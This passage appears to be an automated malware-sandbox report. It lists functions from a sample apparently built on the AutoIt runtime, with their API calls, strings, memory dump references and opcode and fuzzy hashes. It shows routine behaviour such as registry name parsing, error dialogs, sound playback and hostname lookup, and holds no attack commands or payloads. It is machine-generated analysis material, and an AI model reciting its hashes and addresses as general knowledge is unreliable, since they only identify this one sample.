Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 3407a38627bb9e269ff212ac397d1e0abbd1d7f1428a4aa157fd8c703fd702bc
Instruction ID: 103bba1cd192d88c5383eb42b671558e6ebda4bd96473d5cfe16870d7ab6a083
Opcode Fuzzy Hash: 3407a38627bb9e269ff212ac397d1e0abbd1d7f1428a4aa157fd8c703fd702bc
Instruction Fuzzy Hash: C241D67281422DABCB21EFE4DC95EEDF778BF54310F44446AF905A3261EA319D05CB90

Function 00A00E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31

Strings

HKCR, xrefs: 00A00ED9
HKU, xrefs: 00A00F43
HKEY_USERS, xrefs: 00A00F32
HKCU, xrefs: 00A00F21
HKEY_LOCAL_MACHINE, xrefs: 00A00E9A
HKLM, xrefs: 00A00EAF
HKEY_CURRENT_CONFIG, xrefs: 00A00EEE
HKEY_CLASSES_ROOT, xrefs: 00A00EC4
HKCC, xrefs: 00A00EFF
HKEY_CURRENT_USER, xrefs: 00A00F10

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 9b45b1d689965707f2bff4bb7e114be71cbbfc85eebc63d09ff18d9d59f67d32
Instruction ID: 3541bed1d63e11aac9c274eb724bbcf80e1f761f0fcf4b70f5a34855e9997dc2
Opcode Fuzzy Hash: 9b45b1d689965707f2bff4bb7e114be71cbbfc85eebc63d09ff18d9d59f67d32
Instruction Fuzzy Hash: 83416A3110025A8BCF20EF50E895BEF3B60AF92354F580424FC555B2D2DB719D1ADBA0

Function 009DF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009BE2A0,00000010,?,Bad directive syntax error,00A0F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009DF7C2
LoadStringW.USER32(00000000,?,009BE2A0,00000010), ref: 009DF7C9

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

_wprintf.LIBCMT ref: 009DF7FC
__swprintf.LIBCMT ref: 009DF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009DF88D

Strings

Line %d:, xrefs: 009DF818
Error: , xrefs: 009DF85B
%s (%d) : ==> %s.: %s %s, xrefs: 009DF7F7
., xrefs: 009DF873
Line %d (File "%s"):, xrefs: 009DF833

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 21d1fe2e6d51fa7e1b61bb4bc362bf64674b4e102ebdd4a34f5682bff347c1af
Instruction ID: b82163bd8bbe96f860cdd332f566204e612cf2476132c10d02a445936c98d08a
Opcode Fuzzy Hash: 21d1fe2e6d51fa7e1b61bb4bc362bf64674b4e102ebdd4a34f5682bff347c1af
Instruction Fuzzy Hash: 9B215C3294021EBBCF11EFD0CC1AFEEB739BF18300F044866F516662A1EA769618DB51

Function 009E52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

Part of subcall function 00987924: _memmove.LIBCMT ref: 009879AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009E5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009E5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009E5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009E5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009E537A

Strings

status PlayMe mode, xrefs: 009E532B
play PlayMe wait, xrefs: 009E5364
alias PlayMe, xrefs: 009E5309
close PlayMe, xrefs: 009E5341, 009E536E
open , xrefs: 009E52DF
play PlayMe, xrefs: 009E5375

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 074a3fce9f468926da2b7bf79cc98d34f0709a2bc73b67bd77e4e5d27367d3f3
Instruction ID: 59745aa0c7c58dc7c16995a7bfec0258378fe186532149f680f27d0390d59a92
Opcode Fuzzy Hash: 074a3fce9f468926da2b7bf79cc98d34f0709a2bc73b67bd77e4e5d27367d3f3
Instruction Fuzzy Hash: C011C83095025979D720B7A2CC4AEFFBB7CFBD1B44F100819F411A31E1EEA04D05C6A0

Function 009E46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009E46D2
gethostname.WSOCK32(?,00000100), ref: 009E46EC
gethostbyname.WSOCK32(?), ref: 009E46F9
_wcscpy.LIBCMT ref: 009E4721
_memmove.LIBCMT ref: 009E4734
inet_ntoa.WSOCK32(?), ref: 009E473F
_strcat.LIBCMT ref: 009E474D
_wcscpy.LIBCMT ref: 009E4764
WSACleanup.WSOCK32 ref: 009E4772
_wcscpy.LIBCMT ref: 009E4780

Strings

0.0.0.0, xrefs: 009E471B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 39482cd20e78639e9f25171730e068e7ebc99efd0914a50c1f9e4c315f17ce65
Instruction ID: 2c19a71637110bd3f6e9a4134bf555801bcac55e0e6e1d252a217fac09bd73f2
Opcode Fuzzy Hash: 39482cd20e78639e9f25171730e068e7ebc99efd0914a50c1f9e4c315f17ce65
Instruction Fuzzy Hash: FD11E731500118AFCF21AB759C4AFDA77BCEF86711F0441B6F445A6091FF768E8286D1

Function 009E4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009E4F7A

Part of subcall function 009A049F: timeGetTime.WINMM(?,75A4B400,00990E7B), ref: 009A04A3

Sleep.KERNEL32(0000000A), ref: 009E4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 009E4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009E4FEC
SetActiveWindow.USER32 ref: 009E500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009E5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 009E5038
Sleep.KERNEL32(000000FA), ref: 009E5043
IsWindow.USER32 ref: 009E504F
EndDialog.USER32(00000000), ref: 009E5060

Strings

BUTTON, xrefs: 009E4FDE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b050fabe31545cd8caa4e0695869f805f7dcb828bfd12223bf8971505f9d335c
Instruction ID: c7bdc30d1cb0c92cd3e7b2381a84f11402b814551962d845fe6c5369a6c6ac3a
Opcode Fuzzy Hash: b050fabe31545cd8caa4e0695869f805f7dcb828bfd12223bf8971505f9d335c
Instruction Fuzzy Hash: C721C278600748AFE722DFF1EC89B663B69EB8674AF041424F106925B1CBA24D038663

Function 009ED58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

CoInitialize.OLE32(00000000), ref: 009ED5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009ED67D
SHGetDesktopFolder.SHELL32(?), ref: 009ED691
CoCreateInstance.OLE32(00A12D7C,00000000,00000001,00A38C1C,?), ref: 009ED6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009ED74C
CoTaskMemFree.OLE32(?,?), ref: 009ED7A4
_memset.LIBCMT ref: 009ED7E1
SHBrowseForFolderW.SHELL32(?), ref: 009ED81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009ED840
CoTaskMemFree.OLE32(00000000), ref: 009ED847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009ED87E
CoUninitialize.OLE32(00000001,00000000), ref: 009ED880

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 5685be5ecd81e936d16abe09dcd176f113805f450c1823bab6a13843a826fd6e
Instruction ID: 2ffaacc0c998ab71ef0014e932e1aa547069dcd163f84e7f3c2ec0c9520311b2
Opcode Fuzzy Hash: 5685be5ecd81e936d16abe09dcd176f113805f450c1823bab6a13843a826fd6e
Instruction Fuzzy Hash: 0CB10B75A00109AFDB14DFA5C884EAEBBB9FF88304F148469F809EB261DB31ED45CB50

Function 009DC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 009DC283
GetWindowRect.USER32(00000000,?), ref: 009DC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009DC2F3
GetDlgItem.USER32(?,00000002), ref: 009DC2FE
GetWindowRect.USER32(00000000,?), ref: 009DC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009DC364
GetDlgItem.USER32(?,000003E9), ref: 009DC372
GetWindowRect.USER32(00000000,?), ref: 009DC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009DC3C6
GetDlgItem.USER32(?,000003EA), ref: 009DC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009DC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 009DC3FE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
Instruction ID: 212ae479066cd1760d7adae21dc299eb0a2c692ff8fc89c300661816bcb549df
Opcode Fuzzy Hash: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
Instruction Fuzzy Hash: 975121B1B40209AFDF18CFA9DD85A6DBBBAEB88711F148129F515E7290D7719D01CB10

Function 0098201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009820D3
KillTimer.USER32(-00000001,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 0098216E
DestroyAcceleratorTable.USER32(00000000), ref: 009BBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBD0A
DeleteObject.GDI32(00000000), ref: 009BBD1C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7d7fffcd7c6f769ec473c6a978373251a785429c078496fae1893e98b9ad6ae8
Instruction ID: 8e3bd4816a47a4b697650b696cae4503c40c7e3ca648a55e9be8932cbb72e9ab
Opcode Fuzzy Hash: 7d7fffcd7c6f769ec473c6a978373251a785429c078496fae1893e98b9ad6ae8
Instruction Fuzzy Hash: 0F61B339904A04DFC735EF64D948B2977F5FF81312F104929E5425BAB1C775A882DF90

Function 009821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC

GetSysColor.USER32(0000000F), ref: 009821D3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e41753cfab9ff26c82ea94c0d0f6b8a665645193255ff9e9d9668cff02205198
Instruction ID: 301c19988298c4dd96411e19ce681e96291cdb7986c0b0b872e64e3594c02ff3
Opcode Fuzzy Hash: e41753cfab9ff26c82ea94c0d0f6b8a665645193255ff9e9d9668cff02205198
Instruction Fuzzy Hash: 50417F31000544EFDB29AF68DC88BB93B69EB46331F244365FE659A2E2C7718C42DB61

Function 009EA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00A0F910), ref: 009EA90B
GetDriveTypeW.KERNEL32(00000061,00A389A0,00000061), ref: 009EA9D5
_wcscpy.LIBCMT ref: 009EA9FF

Strings

removable, xrefs: 009EA93D
unknown, xrefs: 009EA996
all, xrefs: 009EA911
network, xrefs: 009EA969
ramdisk, xrefs: 009EA97F
cdrom, xrefs: 009EA927
fixed, xrefs: 009EA953

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: f769168a3910099eea28d241199a49b77f47b0d810d22c245067af006bbe498c
Instruction ID: d0f82f327c4f5dd2125362d8ca01693202a77c67083f515e4109af33a174320e
Opcode Fuzzy Hash: f769168a3910099eea28d241199a49b77f47b0d810d22c245067af006bbe498c
Instruction Fuzzy Hash: 10517631108341ABC711EF15C892BAEBBA9AFC5344F55482DF496972A2DB31ED09CB93

Function 00989837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00989862
__swprintf.LIBCMT ref: 009898AC
__i64tow.LIBCMT ref: 009BF5E6

Strings

True, xrefs: 009BF5A7
False, xrefs: 009BF5AE
0x%p, xrefs: 009BF5C8
%.15g, xrefs: 009898A6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: d90f64dd2c94004cf7f074127dc4bbe800efc3836321d0f7150d9f066d600796
Instruction ID: 934aac39711c72486c5569c4dfda991618fa9abc820fde4b6064f54214cf8d45
Opcode Fuzzy Hash: d90f64dd2c94004cf7f074127dc4bbe800efc3836321d0f7150d9f066d600796
Instruction Fuzzy Hash: 3C41F571500206AFDB24EF34CD46BB6B3E8FF86310F24486EF449DA292EA7599418B50

Function 00A07152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A0716A
CreateMenu.USER32 ref: 00A07185
SetMenu.USER32(?,00000000), ref: 00A07194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07221
IsMenu.USER32(?), ref: 00A07237
CreatePopupMenu.USER32 ref: 00A07241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A0726E
DrawMenuBar.USER32 ref: 00A07276

Strings

F, xrefs: 00A07262
0, xrefs: 00A07160

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 9176e27f53ff5388d36ac25d6bb08d4cb39b88a42c2501a1c3f3bbbe14997d63
Instruction ID: 65fdd0bc888a830ca94d55983e469ad75c78472534a6ea4c8a90433aa46d0dad
Opcode Fuzzy Hash: 9176e27f53ff5388d36ac25d6bb08d4cb39b88a42c2501a1c3f3bbbe14997d63
Instruction Fuzzy Hash: D8414979A01209EFDB20DFA4E984EDA7BB5FF49310F144129F945A73A1D731A911CF90

Function 00A074BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A0755E
CreateCompatibleDC.GDI32(00000000), ref: 00A07565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A07578
SelectObject.GDI32(00000000,00000000), ref: 00A07580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A0758B
DeleteDC.GDI32(00000000), ref: 00A07594
GetWindowLongW.USER32(?,000000EC), ref: 00A0759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A075B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A075BE

Strings

static, xrefs: 00A074F6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 226fde14c06971add811541df9062eacde24438a7b34249832613e3de3a0051b
Instruction ID: 4c4722e412625b1fa9cb9ae4ab4bd58cfa22d3cbf60c6ab27dea48112a0ebc98
Opcode Fuzzy Hash: 226fde14c06971add811541df9062eacde24438a7b34249832613e3de3a0051b
Instruction Fuzzy Hash: 25316D72504219BFDF229FA4EC09FDA3B69FF09760F114224FA15A61E0D731E812DBA4

Function 009A6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009A6E3E

Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28

__gmtime64_s.LIBCMT ref: 009A6ED7
__gmtime64_s.LIBCMT ref: 009A6F0D
__gmtime64_s.LIBCMT ref: 009A6F2A
__allrem.LIBCMT ref: 009A6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A6F9C
__allrem.LIBCMT ref: 009A6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A6FD1
__allrem.LIBCMT ref: 009A6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A7006
__invoke_watson.LIBCMT ref: 009A7077

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 39bf5623de90c16420dcc8122a19516c5aaf606b747b3057e9fd6a89dabfd7bb
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
